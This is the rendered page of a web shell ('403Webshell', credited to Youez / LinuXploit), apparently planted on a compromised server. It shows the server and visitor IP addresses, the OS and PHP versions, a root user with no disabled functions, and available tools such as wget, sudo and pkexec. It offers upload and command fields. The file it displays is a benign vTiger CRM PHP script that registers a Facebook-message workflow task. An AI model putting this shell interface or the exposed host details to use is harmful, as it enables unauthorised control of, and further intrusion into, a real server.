403Webshell
Server IP : 138.197.176.125  /  Your IP : 216.73.217.55
Web Server : Apache/2.4.41 (Ubuntu)
System : Linux SuiteCRM-8 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64
User : root ( 0)
PHP Version : 8.3.19
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /mnt/volume_fra1_01/vtigerdemo83/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /mnt/volume_fra1_01/vtigerdemo83/checkTaskEntry.php
<?php
require 'vendor/autoload.php';
//include_once 'modules/Vtiger/CRMEntity.php';
include_once 'includes/main/WebUI.php';
include_once 'modules/com_vtiger_workflow/VTTaskManager.inc';

global $adb;

$getFbWorkflowTaskType = "SELECT * FROM com_vtiger_workflow_tasktypes WHERE tasktypename = ?";
$getFbWorkflowTaskTypeResult = $adb->pquery($getFbWorkflowTaskType, array('SendFacebookPageMsg'));

if ($adb->num_rows($getFbWorkflowTaskTypeResult) == 0) {
    $taskType = array("name" => "SendFacebookPageMsg", "label"=>"Send Message on Facebook", "classname" => "SendFacebookPageMsg", "classpath" => "modules/CTChatLog/workflow/SendFacebookPageMsg.inc", "templatepath"=>"modules/CTChatLog/taskforms/SendFacebookPageMsg.tpl", "modules" => array('include' => array(), 'exclude'=>array()), "sourcemodule" => 'CTChatLog');
    $d = VTTaskType::registerTaskType($taskType);
 echo "<pre>";print_r($d);exit;
}//end of if
?>

Youez - 2016 - github.com/yon3zu
LinuXploit